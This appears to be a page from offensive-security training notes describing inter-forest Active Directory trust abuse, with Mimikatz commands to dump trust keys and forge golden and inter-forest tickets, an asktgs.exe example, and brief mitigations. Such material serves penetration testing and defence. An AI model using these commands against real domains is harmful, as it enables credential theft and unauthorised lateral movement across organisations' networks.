search

Trust Abuse Between Forests

Traversing between forests is not too much different than traversing within a forest. The difference is that SID histories cannot be abused like they can when travelling within a forest because of SID filtering. We cannot escalate privileges to Enterprise Admins between forests like we can within a forest.

Therefore, the privilges we will have in the target forest are limited to the privileges the Domain Admins in our current domain would have in the external forest.

hashtag
Using Inter-Forest Trust Tickets to Move Laterally

hashtag
Step 1

  • To forge these tickets, we need the trust key for the inter-forest trusts. So we must find those first. This will require Admin privileges.

Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName <dc>

hashtag
Step 2

  • Now we can forge the Inter-Forest TGT (doesn't require Admin privileges)

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<current_domain> /sid:<domain_SID> /rc4:<trust_key> /service:krbtgt /target:<target_forest> /ticket:C:\path\to\new\ticket.kirbi"'

hashtag
Step 3

  • And then forge a TGS to the target forest

# asktgs.exe
asktgs.exe <trust_ticket.kirbi> <service>/<target_domain>
# example
asktgs.exe .\trust_ticket1.kirbi CIFS/targetDC.bizcorp.local

hashtag
Step 4

  • Then we can inject the ticket created from the last step

hashtag
Step 5

  • Now check our access

hashtag
Steps 3 and 4 Can Also Be Done with Rubeus.exe

hashtag
Mitigations

  • Employ Selective Authentication so that users between trusts will not be automatically authenticated. Individual access to services between forests should be in use.

  • Although SID filtering is enabled by default, make sure it is place as long as it does not break any applications or disrupt user access. This way Enterprise Admin SID Histories cannot be used to forge inter-forest trust tickets (although Enterprise DC SIDs are exempt from filtering).

PreviousChild to Parent Movement Across TrustsNextMSSQL Server Trust Abuse

Last updated